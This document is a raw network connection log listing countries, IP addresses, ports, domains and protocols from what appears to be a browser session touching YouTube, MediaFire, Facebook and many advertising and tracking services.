| US | 1.1.1.1:53 | 72.66.18.2.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 72.66.18.2.in-addr.arpa | udp |
| GB | 142.250.200.14:443 | fundingchoicesmessages.google.com | udp |
| US | 172.66.42.247:443 | resources.infolinks.com | tcp |
| US | 172.66.42.247:443 | resources.infolinks.com | tcp |
| US | 172.66.42.247:443 | resources.infolinks.com | tcp |
| GB | 216.58.201.100:443 | www.google.com | udp |
| GB | 172.217.169.78:443 | youtube-ui.l.google.com | udp |
| GB | 216.58.204.86:443 | i.ytimg.com | udp |
| US | 1.1.1.1:53 | b.6sc.co | udp |
| US | 1.1.1.1:53 | lh4.googleusercontent.com | udp |
| AU | 1.0.0.1:53 | b.6sc.co | udp |
| GB | 172.217.169.65:443 | cdn.ampproject.org | udp |
| US | 1.1.1.1:53 | e212585.b.akamaiedge.net | udp |
| AU | 1.0.0.1:53 | lh4.googleusercontent.com | udp |
| GB | 142.250.187.225:443 | lh4.googleusercontent.com | tcp |
| GB | 142.250.187.225:443 | lh4.googleusercontent.com | tcp |
| US | 1.1.1.1:53 | googlehosted.l.googleusercontent.com | udp |
| AU | 1.0.0.1:53 | e212585.b.akamaiedge.net | udp |
| US | 1.1.1.1:53 | e212585.b.akamaiedge.net | udp |
| AU | 1.0.0.1:53 | googlehosted.l.googleusercontent.com | udp |
| US | 1.1.1.1:53 | googlehosted.l.googleusercontent.com | udp |
| AU | 1.0.0.1:53 | e212585.b.akamaiedge.net | udp |
| US | 1.1.1.1:53 | 225.187.250.142.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | googlehosted.l.googleusercontent.com | udp |
| AU | 1.0.0.1:53 | 225.187.250.142.in-addr.arpa | udp |
| GB | 142.250.187.225:443 | lh4.googleusercontent.com | udp |
| GB | 172.217.169.78:443 | youtube-ui.l.google.com | udp |
| AU | 1.0.0.1:53 | www.gstatic.com | udp |
| US | 1.1.1.1:53 | b.clarity.ms | udp |
| AU | 1.0.0.1:53 | b.clarity.ms | udp |
| US | 4.153.129.168:443 | b.clarity.ms | tcp |
| US | 1.1.1.1:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 1.1.1.1:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| AU | 1.0.0.1:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 1.1.1.1:53 | rr5---sn-aigl6nzl.googlevideo.com | udp |
| GB | 216.58.204.86:443 | i.ytimg.com | udp |
| AU | 1.0.0.1:53 | rr5---sn-aigl6nzl.googlevideo.com | udp |
| GB | 74.125.168.170:443 | rr5---sn-aigl6nzl.googlevideo.com | tcp |
| US | 1.1.1.1:53 | rr5.sn-aigl6nzl.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr5.sn-aigl6nzl.googlevideo.com | udp |
| US | 1.1.1.1:53 | rr5.sn-aigl6nzl.googlevideo.com | udp |
| GB | 74.125.168.170:443 | rr5.sn-aigl6nzl.googlevideo.com | udp |
| GB | 172.217.169.42:443 | jnn-pa.googleapis.com | udp |
| US | 1.1.1.1:53 | 170.168.125.74.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 170.168.125.74.in-addr.arpa | udp |
| US | 1.1.1.1:53 | rr4---sn-aigl6nzs.googlevideo.com | udp |
| GB | 74.125.175.73:443 | rr4---sn-aigl6nzs.googlevideo.com | tcp |
| US | 1.1.1.1:53 | rr4.sn-aigl6nzs.googlevideo.com | udp |
| US | 1.1.1.1:53 | rr4.sn-aigl6nzs.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr4.sn-aigl6nzs.googlevideo.com | udp |
| GB | 74.125.175.73:443 | rr4.sn-aigl6nzs.googlevideo.com | udp |
| US | 1.1.1.1:53 | 73.175.125.74.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 73.175.125.74.in-addr.arpa | udp |
| GB | 172.217.169.78:443 | youtube-ui.l.google.com | tcp |
| GB | 172.217.169.78:443 | youtube-ui.l.google.com | udp |
| GB | 216.58.204.86:443 | i.ytimg.com | tcp |
| US | 1.1.1.1:53 | yt3.ggpht.com | udp |
| GB | 216.58.212.193:443 | googlehosted.l.googleusercontent.com | tcp |
| AU | 1.0.0.1:53 | yt3.ggpht.com | udp |
| GB | 216.58.212.225:443 | yt3.ggpht.com | tcp |
| US | 1.1.1.1:53 | ade.googlesyndication.com | udp |
| AU | 1.0.0.1:53 | fonts.gstatic.com | udp |
| AU | 1.0.0.1:53 | ade.googlesyndication.com | udp |
| US | 1.1.1.1:53 | 193.212.58.216.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 194.212.58.216.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 225.212.58.216.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 194.212.58.216.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 193.212.58.216.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 225.212.58.216.in-addr.arpa | udp |
| US | 1.1.1.1:53 | rr3---sn-aigl6nze.googlevideo.com | udp |
| GB | 74.125.168.136:443 | rr3---sn-aigl6nze.googlevideo.com | tcp |
| GB | 74.125.168.136:443 | rr3---sn-aigl6nze.googlevideo.com | tcp |
| US | 1.1.1.1:53 | rr3.sn-aigl6nze.googlevideo.com | udp |
| US | 1.1.1.1:53 | rr3.sn-aigl6nze.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr3.sn-aigl6nze.googlevideo.com | udp |
| GB | 74.125.168.136:443 | rr3.sn-aigl6nze.googlevideo.com | udp |
| US | 1.1.1.1:53 | rr2---sn-aigzrn7l.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr2---sn-aigzrn7l.googlevideo.com | udp |
| GB | 173.194.5.231:443 | rr2---sn-aigzrn7l.googlevideo.com | tcp |
| US | 1.1.1.1:53 | rr2.sn-aigzrn7l.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr2.sn-aigzrn7l.googlevideo.com | udp |
| US | 1.1.1.1:53 | rr2.sn-aigzrn7l.googlevideo.com | udp |
| US | 1.1.1.1:53 | 136.168.125.74.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 231.5.194.173.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | rr2.sn-aigzrn7l.googlevideo.com | udp |
| AU | 1.0.0.1:53 | 136.168.125.74.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 231.5.194.173.in-addr.arpa | udp |
| GB | 173.194.5.231:443 | rr2.sn-aigzrn7l.googlevideo.com | udp |
| US | 1.1.1.1:53 | ya.ru | udp |
| AU | 1.0.0.1:53 | ya.ru | udp |
| US | 1.1.1.1:53 | ya.ru | udp |
| RU | 5.255.255.242:443 | ya.ru | tcp |
| AU | 1.0.0.1:53 | ya.ru | udp |
| GB | 142.250.179.226:443 | googleads.g.doubleclick.net | udp |
| US | 1.1.1.1:53 | rr1---sn-q4fl6nsd.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr1---sn-q4fl6nsd.googlevideo.com | udp |
| US | 74.125.3.166:443 | rr1---sn-q4fl6nsd.googlevideo.com | tcp |
| US | 74.125.3.166:443 | rr1---sn-q4fl6nsd.googlevideo.com | tcp |
| US | 1.1.1.1:53 | rr1.sn-q4fl6nsd.googlevideo.com | udp |
| GB | 142.250.187.230:443 | static.doubleclick.net | udp |
| US | 1.1.1.1:53 | rr1.sn-q4fl6nsd.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr1.sn-q4fl6nsd.googlevideo.com | udp |
| AU | 1.0.0.1:53 | www.gstatic.com | udp |
| US | 1.1.1.1:53 | rr1---sn-q4fl6nsd.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr1---sn-q4fl6nsd.googlevideo.com | udp |
| US | 74.125.3.166:443 | rr1---sn-q4fl6nsd.googlevideo.com | tcp |
| GB | 172.217.169.78:443 | youtube-ui.l.google.com | udp |
| US | 1.1.1.1:53 | 166.3.125.74.in-addr.arpa | udp |
| US | 1.1.1.1:53 | rr4---sn-q4flrner.googlevideo.com | udp |
| US | 172.217.131.9:443 | rr4---sn-q4flrner.googlevideo.com | tcp |
| US | 172.217.131.9:443 | rr4---sn-q4flrner.googlevideo.com | tcp |
| US | 1.1.1.1:53 | rr4.sn-q4flrner.googlevideo.com | udp |
| US | 1.1.1.1:53 | rr4.sn-q4flrner.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr4.sn-q4flrner.googlevideo.com | udp |
| US | 1.1.1.1:53 | rr4---sn-q4flrner.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr4---sn-q4flrner.googlevideo.com | udp |
| US | 172.217.131.9:443 | rr4---sn-q4flrner.googlevideo.com | tcp |
| US | 172.217.131.9:443 | rr4---sn-q4flrner.googlevideo.com | tcp |
| US | 1.1.1.1:53 | 9.131.217.172.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 9.131.217.172.in-addr.arpa | udp |
| US | 172.217.131.9:443 | rr4---sn-q4flrner.googlevideo.com | tcp |
| US | 172.217.131.9:443 | rr4---sn-q4flrner.googlevideo.com | tcp |
| US | 1.1.1.1:53 | ade.googlesyndication.com | udp |
| AU | 1.0.0.1:53 | ade.googlesyndication.com | udp |
| US | 1.1.1.1:53 | ade.googlesyndication.com | udp |
| US | 1.1.1.1:53 | www.mediafire.com | udp |
| AU | 1.0.0.1:53 | ade.googlesyndication.com | udp |
| AU | 1.0.0.1:53 | www.mediafire.com | udp |
| US | 104.17.151.117:443 | www.mediafire.com | tcp |
| US | 1.1.1.1:53 | www.mediafire.com | udp |
| US | 1.1.1.1:53 | www.mediafire.com | udp |
| AU | 1.0.0.1:53 | www.mediafire.com | udp |
| US | 104.17.151.117:443 | www.mediafire.com | udp |
| US | 1.1.1.1:53 | static.mediafire.com | udp |
| GB | 216.58.201.100:443 | www.google.com | tcp |
| US | 1.1.1.1:53 | ajax.googleapis.com | udp |
| AU | 1.0.0.1:53 | static.mediafire.com | udp |
| AU | 1.0.0.1:53 | www.googletagmanager.com | udp |
| AU | 1.0.0.1:53 | ajax.googleapis.com | udp |
| US | 104.17.150.117:443 | static.mediafire.com | tcp |
| US | 104.17.150.117:443 | static.mediafire.com | tcp |
| US | 104.17.150.117:443 | static.mediafire.com | tcp |
| US | 104.17.150.117:443 | static.mediafire.com | tcp |
| US | 104.17.150.117:443 | static.mediafire.com | tcp |
| US | 1.1.1.1:53 | static.mediafire.com | udp |
| AU | 1.0.0.1:53 | static.mediafire.com | udp |
| AU | 1.0.0.1:53 | www.googletagmanager.com | udp |
| US | 1.1.1.1:53 | ajax.googleapis.com | udp |
| US | 1.1.1.1:53 | static.mediafire.com | udp |
| US | 104.17.150.117:443 | static.mediafire.com | udp |
| AU | 1.0.0.1:53 | www.googletagmanager.com | udp |
| AU | 1.0.0.1:53 | static.mediafire.com | udp |
| GB | 216.58.201.100:443 | www.google.com | udp |
| US | 1.1.1.1:53 | 117.151.17.104.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 117.150.17.104.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 8.200.250.142.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 117.151.17.104.in-addr.arpa | udp |
| US | 1.1.1.1:53 | cdn.amplitude.com | udp |
| GB | 216.58.201.100:443 | www.google.com | tcp |
| AU | 1.0.0.1:53 | cdn.amplitude.com | udp |
| US | 1.1.1.1:53 | cdn.amplitude.com | udp |
| US | 1.1.1.1:53 | connect.facebook.net | udp |
| AU | 1.0.0.1:53 | cdn.amplitude.com | udp |
| US | 1.1.1.1:53 | cdn.amplitude.com | udp |
| AU | 1.0.0.1:53 | connect.facebook.net | udp |
| US | 1.1.1.1:53 | scontent.xx.fbcdn.net | udp |
| US | 1.1.1.1:53 | translate.google.com | udp |
| AU | 1.0.0.1:53 | cdn.amplitude.com | udp |
| AU | 1.0.0.1:53 | scontent.xx.fbcdn.net | udp |
| AU | 1.0.0.1:53 | translate.google.com | udp |
| US | 1.1.1.1:53 | scontent.xx.fbcdn.net | udp |
| GB | 172.217.16.238:443 | translate.google.com | tcp |
| US | 1.1.1.1:53 | www3.l.google.com | udp |
| AU | 1.0.0.1:53 | scontent.xx.fbcdn.net | udp |
| AU | 1.0.0.1:53 | www3.l.google.com | udp |
| US | 1.1.1.1:53 | www3.l.google.com | udp |
| AU | 1.0.0.1:53 | www3.l.google.com | udp |
| GB | 172.217.16.238:443 | translate.google.com | udp |
| GB | 18.154.84.20:443 | cdn.amplitude.com | tcp |
| GB | 163.70.147.23:443 | scontent.xx.fbcdn.net | tcp |
| US | 1.1.1.1:53 | translate.googleapis.com | udp |
| AU | 1.0.0.1:53 | translate.googleapis.com | udp |
| GB | 163.70.147.23:443 | scontent.xx.fbcdn.net | udp |
| US | 1.1.1.1:53 | translate.googleapis.com | udp |
| AU | 1.0.0.1:53 | translate.googleapis.com | udp |
| US | 1.1.1.1:53 | translate.googleapis.com | udp |
| AU | 1.0.0.1:53 | translate.googleapis.com | udp |
| US | 1.1.1.1:53 | 3.169.217.172.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 20.84.154.18.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 23.147.70.163.in-addr.arpa | udp |
| US | 1.1.1.1:53 | api.amplitude.com | udp |
| AU | 1.0.0.1:53 | 20.84.154.18.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 23.147.70.163.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | api.amplitude.com | udp |
| US | 52.89.101.77:443 | api.amplitude.com | tcp |
| US | 1.1.1.1:53 | api.amplitude.com | udp |
| AU | 1.0.0.1:53 | api.amplitude.com | udp |
| US | 1.1.1.1:53 | api.amplitude.com | udp |
| US | 1.1.1.1:53 | translate-pa.googleapis.com | udp |
| AU | 1.0.0.1:53 | www.google-analytics.com | udp |
| GB | 142.250.179.234:443 | translate-pa.googleapis.com | tcp |
| US | 1.1.1.1:53 | translate-pa.googleapis.com | udp |
| AU | 1.0.0.1:53 | translate-pa.googleapis.com | udp |
| US | 1.1.1.1:53 | translate-pa.googleapis.com | udp |
| GB | 142.250.179.234:443 | translate-pa.googleapis.com | udp |
| AU | 1.0.0.1:53 | translate-pa.googleapis.com | udp |
| US | 1.1.1.1:53 | region1.analytics.google.com | udp |
| US | 1.1.1.1:53 | stats.g.doubleclick.net | udp |
| US | 1.1.1.1:53 | www.google.co.uk | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| AU | 1.0.0.1:53 | stats.g.doubleclick.net | udp |
| AU | 1.0.0.1:53 | www.google.co.uk | udp |
| US | 1.1.1.1:53 | region1.analytics.google.com | udp |
| US | 1.1.1.1:53 | stats.g.doubleclick.net | udp |
| US | 1.1.1.1:53 | www.google.co.uk | udp |
| AU | 1.0.0.1:53 | region1.analytics.google.com | udp |
| US | 1.1.1.1:53 | region1.analytics.google.com | udp |
| AU | 1.0.0.1:53 | stats.g.doubleclick.net | udp |
| AU | 1.0.0.1:53 | www.google.co.uk | udp |
| US | 1.1.1.1:53 | stats.g.doubleclick.net | udp |
| US | 1.1.1.1:53 | www.google.co.uk | udp |
| AU | 1.0.0.1:53 | region1.analytics.google.com | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| GB | 163.70.147.23:443 | scontent.xx.fbcdn.net | udp |
| US | 1.1.1.1:53 | www.facebook.com | udp |
| GB | 157.240.214.35:443 | www.facebook.com | tcp |
| US | 1.1.1.1:53 | star-mini.c10r.facebook.com | udp |
| GB | 173.194.76.157:443 | stats.g.doubleclick.net | tcp |
| AU | 1.0.0.1:53 | star-mini.c10r.facebook.com | udp |
| US | 1.1.1.1:53 | star-mini.c10r.facebook.com | udp |
| AU | 1.0.0.1:53 | star-mini.c10r.facebook.com | udp |
| US | 1.1.1.1:53 | 77.101.89.52.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 35.214.240.157.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 157.76.194.173.in-addr.arpa | udp |
| GB | 173.194.76.157:443 | stats.g.doubleclick.net | udp |
| AU | 1.0.0.1:53 | 157.76.194.173.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 77.101.89.52.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 234.179.250.142.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 35.214.240.157.in-addr.arpa | udp |
| GB | 157.240.214.35:443 | star-mini.c10r.facebook.com | udp |
| GB | 172.217.169.78:443 | youtube-ui.l.google.com | udp |
| US | 1.1.1.1:53 | the.gatekeeperconsent.com | udp |
| US | 1.1.1.1:53 | btloader.com | udp |
| US | 1.1.1.1:53 | www.ezojs.com | udp |
| AU | 1.0.0.1:53 | www.ezojs.com | udp |
| US | 1.1.1.1:53 | the.gatekeeperconsent.com | udp |
| US | 104.21.42.32:443 | the.gatekeeperconsent.com | tcp |
| US | 172.67.170.144:443 | www.ezojs.com | tcp |
| US | 1.1.1.1:53 | www.ezojs.com.cdn.cloudflare.net | udp |
| US | 1.1.1.1:53 | static.cloudflareinsights.com | udp |
| US | 1.1.1.1:53 | the.gatekeeperconsent.com | udp |
| AU | 1.0.0.1:53 | www.ezojs.com.cdn.cloudflare.net | udp |
| US | 1.1.1.1:53 | www.ezojs.com.cdn.cloudflare.net | udp |
| AU | 1.0.0.1:53 | static.cloudflareinsights.com | udp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 1.1.1.1:53 | static.cloudflareinsights.com | udp |
| AU | 1.0.0.1:53 | the.gatekeeperconsent.com | udp |
| AU | 1.0.0.1:53 | www.ezojs.com.cdn.cloudflare.net | udp |
| AU | 1.0.0.1:53 | static.cloudflareinsights.com | udp |
| US | 1.1.1.1:53 | static.cloudflareinsights.com | udp |
| US | 172.67.170.144:443 | www.ezojs.com.cdn.cloudflare.net | udp |
| US | 104.21.42.32:443 | the.gatekeeperconsent.com | udp |
| AU | 1.0.0.1:53 | static.cloudflareinsights.com | udp |
| US | 1.1.1.1:53 | privacy.gatekeeperconsent.com | udp |
| US | 1.1.1.1:53 | cdn.otnolatrnup.com | udp |
| AU | 1.0.0.1:53 | privacy.gatekeeperconsent.com | udp |
| AU | 1.0.0.1:53 | cdn.otnolatrnup.com | udp |
| US | 1.1.1.1:53 | cdn.otnolatrnup.com | udp |
| US | 104.19.208.227:443 | cdn.otnolatrnup.com | tcp |
| US | 172.67.199.186:443 | privacy.gatekeeperconsent.com | tcp |
| US | 1.1.1.1:53 | privacy.gatekeeperconsent.com | udp |
| AU | 1.0.0.1:53 | cdn.otnolatrnup.com | udp |
| AU | 1.0.0.1:53 | privacy.gatekeeperconsent.com | udp |
| US | 1.1.1.1:53 | cdn.otnolatrnup.com | udp |
| US | 1.1.1.1:53 | privacy.gatekeeperconsent.com | udp |
| FR | 13.37.187.223:443 | g.ezoic.net | tcp |
| US | 1.1.1.1:53 | g.ezoic.net | udp |
| AU | 1.0.0.1:53 | cdn.otnolatrnup.com | udp |
| AU | 1.0.0.1:53 | privacy.gatekeeperconsent.com | udp |
| AU | 1.0.0.1:53 | g.ezoic.net | udp |
| US | 1.1.1.1:53 | g.ezoic.net | udp |
| US | 172.67.199.186:443 | privacy.gatekeeperconsent.com | udp |
| US | 104.19.208.227:443 | cdn.otnolatrnup.com | udp |
| US | 172.67.199.186:443 | privacy.gatekeeperconsent.com | tcp |
| US | 1.1.1.1:53 | go.ezodn.com | udp |
| AU | 1.0.0.1:53 | go.ezodn.com | udp |
| US | 1.1.1.1:53 | otnolatrnup.com | udp |
| US | 1.1.1.1:53 | go.ezodn.com | udp |
| US | 1.1.1.1:53 | www.mediafiredls.com | udp |
| AU | 1.0.0.1:53 | otnolatrnup.com | udp |
| AU | 1.0.0.1:53 | go.ezodn.com | udp |
| US | 104.19.208.227:443 | otnolatrnup.com | tcp |
| US | 1.1.1.1:53 | otnolatrnup.com | udp |
| US | 1.1.1.1:53 | go.ezodn.com | udp |
| AU | 1.0.0.1:53 | www.mediafiredls.com | udp |
| US | 172.67.73.78:443 | www.mediafiredls.com | tcp |
| US | 1.1.1.1:53 | www.mediafiredls.com | udp |
| AU | 1.0.0.1:53 | otnolatrnup.com | udp |
| AU | 1.0.0.1:53 | go.ezodn.com | udp |
| AU | 1.0.0.1:53 | www.mediafiredls.com | udp |
| US | 1.1.1.1:53 | otnolatrnup.com | udp |
| US | 1.1.1.1:53 | www.mediafiredls.com | udp |
| AU | 1.0.0.1:53 | otnolatrnup.com | udp |
| GB | 142.250.179.234:443 | translate-pa.googleapis.com | udp |
| US | 1.1.1.1:53 | securepubads.g.doubleclick.net | udp |
| US | 1.1.1.1:53 | g.ezodn.com | udp |
| AU | 1.0.0.1:53 | securepubads.g.doubleclick.net | udp |
| US | 1.1.1.1:53 | securepubads.g.doubleclick.net | udp |
| AU | 1.0.0.1:53 | g.ezodn.com | udp |
| US | 1.1.1.1:53 | g.ezodn.com | udp |
| AU | 1.0.0.1:53 | securepubads.g.doubleclick.net | udp |
| AU | 1.0.0.1:53 | g.ezodn.com | udp |
| US | 1.1.1.1:53 | g.ezodn.com | udp |
| AU | 1.0.0.1:53 | g.ezodn.com | udp |
| US | 104.19.208.227:443 | otnolatrnup.com | udp |
| US | 1.1.1.1:53 | tags.crwdcntrl.net | udp |
| US | 1.1.1.1:53 | bcp.crwdcntrl.net | udp |
| US | 1.1.1.1:53 | ad.crwdcntrl.net | udp |
| US | 1.1.1.1:53 | 32.42.21.104.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 144.170.67.172.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 73.80.16.104.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 227.208.19.104.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 186.199.67.172.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 223.187.37.13.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 78.73.67.172.in-addr.arpa | udp |
| US | 1.1.1.1:53 | tags.crwdcntrl.net | udp |
| US | 1.1.1.1:53 | bcp.crwdcntrl.net | udp |
| AU | 1.0.0.1:53 | ad.crwdcntrl.net | udp |
| US | 172.67.41.60:443 | btloader.com | tcp |
| US | 104.21.87.79:443 | g.ezodn.com | tcp |
| US | 104.21.87.79:443 | g.ezodn.com | tcp |
| US | 104.21.87.79:443 | g.ezodn.com | tcp |
| US | 104.21.87.79:443 | g.ezodn.com | tcp |
| US | 104.21.87.79:443 | g.ezodn.com | tcp |
| US | 104.21.87.79:443 | g.ezodn.com | tcp |
| US | 172.67.142.121:443 | g.ezodn.com | tcp |
| GB | 18.165.201.18:443 | tags.crwdcntrl.net | tcp |
| AU | 1.0.0.1:53 | 32.42.21.104.in-addr.arpa | udp |
| IE | 54.194.72.83:443 | ad.crwdcntrl.net | tcp |
| US | 1.1.1.1:53 | ad.crwdcntrl.net | udp |
| AU | 1.0.0.1:53 | 223.187.37.13.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 73.80.16.104.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 144.170.67.172.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 186.199.67.172.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 78.73.67.172.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | tags.crwdcntrl.net | udp |
| AU | 1.0.0.1:53 | bcp.crwdcntrl.net | udp |
| US | 1.1.1.1:53 | api.amplitude.com | udp |
| US | 1.1.1.1:53 | tags.crwdcntrl.net | udp |
| US | 1.1.1.1:53 | bcp.crwdcntrl.net | udp |
| IE | 54.194.72.83:443 | bcp.crwdcntrl.net | tcp |
| AU | 1.0.0.1:53 | ad.crwdcntrl.net | udp |
| AU | 1.0.0.1:53 | api.amplitude.com | udp |
| AU | 1.0.0.1:53 | tags.crwdcntrl.net | udp |
| US | 1.1.1.1:53 | ad.crwdcntrl.net | udp |
| AU | 1.0.0.1:53 | bcp.crwdcntrl.net | udp |
| AU | 1.0.0.1:53 | ad.crwdcntrl.net | udp |
| US | 104.21.87.79:443 | g.ezodn.com | udp |
| US | 1.1.1.1:53 | bshr.ezodn.com | udp |
| US | 1.1.1.1:53 | ad-delivery.net | udp |
| US | 172.67.142.121:443 | bshr.ezodn.com | udp |
| AU | 1.0.0.1:53 | bshr.ezodn.com | udp |
| AU | 1.0.0.1:53 | ad-delivery.net | udp |
| AU | 1.0.0.1:53 | ad.doubleclick.net | udp |
| US | 172.67.142.121:443 | bshr.ezodn.com | tcp |
| US | 1.1.1.1:53 | bshr.ezodn.com | udp |
| US | 172.67.142.121:443 | bshr.ezodn.com | tcp |
| AU | 1.0.0.1:53 | bshr.ezodn.com | udp |
| US | 172.67.142.121:443 | bshr.ezodn.com | udp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 1.1.1.1:53 | api.btloader.com | udp |
| AU | 1.0.0.1:53 | api.btloader.com | udp |
| GB | 142.250.200.14:443 | fundingchoicesmessages.google.com | tcp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| GB | 142.250.200.14:443 | fundingchoicesmessages.google.com | udp |
| US | 1.1.1.1:53 | 60.41.67.172.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 18.201.165.18.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 121.142.67.172.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 83.72.194.54.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 18.201.165.18.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 60.41.67.172.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 83.72.194.54.in-addr.arpa | udp |
| US | 1.1.1.1:53 | www.mediafire.com | udp |
| AU | 1.0.0.1:53 | www.mediafire.com | udp |
| US | 1.1.1.1:53 | id.a-mx.com | udp |
| US | 1.1.1.1:53 | ups.analytics.yahoo.com | udp |
| US | 1.1.1.1:53 | gum.criteo.com | udp |
| US | 1.1.1.1:53 | id.hadron.ad.gt | udp |
| US | 1.1.1.1:53 | id5-sync.com | udp |
| US | 1.1.1.1:53 | api.rlcdn.com | udp |
| US | 1.1.1.1:53 | id.crwdcntrl.net | udp |
| US | 35.71.131.137:443 | match.adsrvr.org | tcp |
| US | 1.1.1.1:53 | match.adsrvr.org | udp |
| US | 1.1.1.1:53 | googleads.g.doubleclick.net | udp |
| US | 1.1.1.1:53 | ep1.adtrafficquality.google | udp |
| US | 1.1.1.1:53 | cdn-ima.33across.com | udp |
| US | 1.1.1.1:53 | oa.openxcdn.net | udp |
| US | 1.1.1.1:53 | static.criteo.net | udp |
| US | 1.1.1.1:53 | invstatic101.creativecdn.com | udp |
| NL | 79.127.227.46:443 | id.a-mx.com | tcp |
| US | 1.1.1.1:53 | id.a-mx.com | udp |
| GB | 87.248.114.12:443 | ups.analytics.yahoo.com | tcp |
| US | 1.1.1.1:53 | dcs-ups.g03.yahoodns.net | udp |
| AU | 1.0.0.1:53 | gum.criteo.com | udp |
| AU | 1.0.0.1:53 | id5-sync.com | udp |
| AU | 1.0.0.1:53 | id.hadron.ad.gt | udp |
| AU | 1.0.0.1:53 | api.rlcdn.com | udp |
| AU | 1.0.0.1:53 | id.crwdcntrl.net | udp |
| AU | 1.0.0.1:53 | match.adsrvr.org | udp |
| AU | 1.0.0.1:53 | googleads.g.doubleclick.net | udp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 1.1.1.1:53 | gum.nl3.vip.prod.criteo.com | udp |
| DE | 162.19.138.120:443 | id5-sync.com | tcp |
| US | 1.1.1.1:53 | id5-sync.com | udp |
| IE | 52.215.68.71:443 | id.crwdcntrl.net | tcp |
| US | 1.1.1.1:53 | id.crwdcntrl.net | udp |
| US | 34.120.133.55:443 | api.rlcdn.com | tcp |
| US | 1.1.1.1:53 | api.rlcdn.com | udp |
| US | 104.22.5.69:443 | id.hadron.ad.gt | tcp |
| US | 1.1.1.1:53 | id.hadron.ad.gt.cdn.cloudflare.net | udp |
| GB | 172.217.16.226:443 | googleads.g.doubleclick.net | tcp |
| GB | 172.217.16.226:443 | googleads.g.doubleclick.net | tcp |
| AU | 1.0.0.1:53 | ep1.adtrafficquality.google | udp |
| US | 1.1.1.1:53 | ep1.adtrafficquality.google | udp |
| US | 1.1.1.1:53 | oa.openxcdn.net | udp |
| US | 1.1.1.1:53 | static.nl3.vip.prod.criteo.net | udp |
| US | 1.1.1.1:53 | invstatic101.creativecdn.com | udp |
| AU | 1.0.0.1:53 | id.a-mx.com | udp |
| AU | 1.0.0.1:53 | dcs-ups.g03.yahoodns.net | udp |
| US | 1.1.1.1:53 | id.a-mx.com | udp |
| US | 1.1.1.1:53 | dcs-ups.g03.yahoodns.net | udp |
| US | 1.1.1.1:53 | gum.nl3.vip.prod.criteo.com | udp |
| AU | 1.0.0.1:53 | id5-sync.com | udp |
| AU | 1.0.0.1:53 | id.crwdcntrl.net | udp |
| AU | 1.0.0.1:53 | id.hadron.ad.gt.cdn.cloudflare.net | udp |
| US | 1.1.1.1:53 | id5-sync.com | udp |
| US | 1.1.1.1:53 | id.hadron.ad.gt.cdn.cloudflare.net | udp |
| US | 1.1.1.1:53 | id.crwdcntrl.net | udp |
| AU | 1.0.0.1:53 | ep1.adtrafficquality.google | udp |
| AU | 1.0.0.1:53 | static.nl3.vip.prod.criteo.net | udp |
| AU | 1.0.0.1:53 | oa.openxcdn.net | udp |
| AU | 1.0.0.1:53 | invstatic101.creativecdn.com | udp |
